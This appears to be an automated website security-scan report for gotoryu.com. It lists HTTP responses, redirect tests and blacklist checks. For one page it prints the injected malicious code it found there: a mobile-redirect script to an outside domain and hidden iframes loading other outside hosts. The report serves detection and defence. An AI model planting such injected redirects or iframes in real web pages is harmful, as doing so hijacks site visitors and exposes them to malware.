Scanned pages/files
| Request | Server response | Status |
http://gotoryu.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 21 Mar 2015 05:25:00 GMT Via: 1.1 varnish Accept-Ranges: bytes Age: 0 Location: http://www.gotoryu.com/ Server: nginx/1.6.2 Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Cache: HIT X-Pingback: http://www.gotoryu.com/kr/xmlrpc.php X-Varnish: 1272118669 1272118668 | clean |
http://www.gotoryu.com/ | 200 OK Content-Length: 10165 Content-Type: text/html | clean |
http://www.gotoryu.com/kr/wp-content/themes/gotoryu/js/jquery-1.4.2.min.js | 200 OK Content-Length: 72174 Content-Type: application/javascript | clean |
http://www.gotoryu.com/kr/wp-content/themes/gotoryu/js/jquery.easing.js | 200 OK Content-Length: 8101 Content-Type: application/javascript | clean |
http://www.gotoryu.com/kr/wp-content/themes/gotoryu/js/jquery.jscrollpane.js | 200 OK Content-Length: 24971 Content-Type: application/javascript | clean |
http://www.gotoryu.com/kr/wp-content/themes/gotoryu/js/main.js | 200 OK Content-Length: 9695 Content-Type: application/javascript | clean |
http://www.gotoryu.com/kr/wp-content/themes/gotoryu/js/jquery.tools.min.js | 200 OK Content-Length: 6139 Content-Type: application/javascript | clean |
http://www.gotoryu.com/kr/wp-content/themes/gotoryu/js/cufon.js | 200 OK Content-Length: 18257 Content-Type: application/javascript | clean |
http://www.gotoryu.com/kr/wp-content/themes/gotoryu/js/mgopen.js | 200 OK Content-Length: 23911 Content-Type: application/javascript | clean |
http://www.gotoryu.com/kr/wp-content/themes/gotoryu/js/jquery.fullscreenr.js | 200 OK Content-Length: 1542 Content-Type: application/javascript | clean |
http://www.gotoryu.com/kr/wp-content/themes/gotoryu/js/fancybox/jquery.fancybox-1.3.1.pack.js | 200 OK Content-Length: 14731 Content-Type: application/javascript | clean |
http://www.gotoryu.com/kr/wp-content/plugins/flv-embed/swfobject.js | 200 OK Content-Length: 6880 Content-Type: application/javascript | clean |
http://www.gotoryu.com/kr/wp-content/themes/gotoryu/js/innerfade.js | 200 OK Content-Length: 4924 Content-Type: application/javascript | clean |
http://gotoryu.com/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sat, 21 Mar 2015 05:25:08 GMT Pragma: no-cache Via: 1.1 varnish Accept-Ranges: bytes Age: 0 Location: http://www.gotoryu.com/test404page.js Server: nginx/1.6.2 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Cache: MISS X-Pingback: http://www.gotoryu.com/kr/xmlrpc.php X-Varnish: 1272118689 | clean |
http://www.gotoryu.com/test404page.js | 404 Not Found Content-Length: 10198 Content-Type: text/html | clean |
http://www.gotoryu.com/ch | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 21 Mar 2015 05:25:09 GMT Via: 1.1 varnish Accept-Ranges: bytes Age: 0 Location: http://www.gotoryu.com/ch/ Server: nginx/1.6.2 Content-Length: 234 Content-Type: text/html; charset=iso-8859-1 X-Cache: MISS X-Varnish: 1272118691 | clean |
http://www.gotoryu.com/ch/ | 200 OK Content-Length: 33548 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|iphone|ipad)/i)!==null){ window.location = "http://go.unilead.net/SH20k"; } Decoded script: <div style="position: absolute;left: 0;bottom: 100%;"><iframe src="http://bimis.ml/?1" width="150" height="450"></iframe></div> Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://turginya.ru/?1625 <iframe src="http://turginya.ru/?1625" width="0" height="0" align="left"> | ||
http://www.gotoryu.com/ch/wp-content/themes/gotoryu/js/jquery-1.4.2.min.js | 200 OK Content-Length: 72174 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gotoryu.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 21 Mar 2015 05:25:00 GMT
Via: 1.1 varnish
Accept-Ranges: bytes
Age: 0
Location: http://www.gotoryu.com/
Server: nginx/1.6.2
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Cache: HIT
X-Pingback: http://www.gotoryu.com/kr/xmlrpc.php
X-Varnish: 1272118669 1272118668
...0 bytes of data.
GET / HTTP/1.1
Host: gotoryu.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 21 Mar 2015 05:25:00 GMT
Via: 1.1 varnish
Accept-Ranges: bytes
Age: 0
Location: http://www.gotoryu.com/
Server: nginx/1.6.2
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Cache: HIT
X-Pingback: http://www.gotoryu.com/kr/xmlrpc.php
X-Varnish: 1272118669 1272118668
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: gotoryu.com
Referer: http://www.google.com/search?q=gotoryu.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: gotoryu.com
Referer: http://www.google.com/search?q=gotoryu.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gotoryu.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://gotoryu.com/
Result: gotoryu.com is not infected or malware details are not published yet.
Result: gotoryu.com is not infected or malware details are not published yet.